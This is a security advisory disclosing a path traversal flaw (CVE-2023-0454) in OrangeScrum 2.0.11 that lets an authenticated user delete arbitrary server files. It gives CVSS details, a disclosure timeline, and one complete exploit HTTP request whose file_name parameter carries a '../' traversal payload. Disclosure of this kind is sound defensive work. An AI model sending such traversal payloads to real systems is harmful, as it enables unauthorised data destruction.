OrangeScrum 2.0.11 - Arbitrary File Delete via file_name
Summary
| Name | OrangeScrum 2.0.11 - Arbitrary File Delete via file_name |
| Code name | |
| Product | OrangeScrum |
| Affected versions | 2.0.11 |
| State | Public |
| Release date | 2023-01-30 |
Vulnerability
| Kind | Lack of data validation - Path Traversal |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H |
| CVSSv3.1 Base Score | 8.1 |
| Exploit available | No |
| CVE ID(s) |
Description
OrangeScrum version 2.0.11 allows an authenticated external attacker to delete arbitrary local files from the server. This is possible because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
Vulnerability
This vulnerability occurs because the application uses an unsanitized attacker-controlled parameter to construct an internal path.
Exploit
To exploit this vulnerability, we only need to send the following malicious malicious request to the server.
POST /projects/delete_file HTTP/1.1
Host: retr02332bughunter.orangescrum.com
Cookie: USER_UNIQ=1515f12e8e8fc20b7a103011dee82b89; USERTYP=2; USERTZ=49; USERSUB_TYPE=0;
User-Agent: Retr02332
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 96
Connection: close
file_name=../../../../../../../../../../../../../var/www/html/orangescrum/app/webroot/hacked.txt
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-0454 to refer to this issue from now on.
System Information
-
Version: OrangeScrum 2.0.11
-
Operating System: GNU/Linux
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/Orangescrum/orangescrum/
Timeline
2023-01-23
Vulnerability discovered.
2023-01-23
Vendor contacted.
2023-01-23
Vendor replied acknowledging the report.
2023-01-30
Public Disclosure.
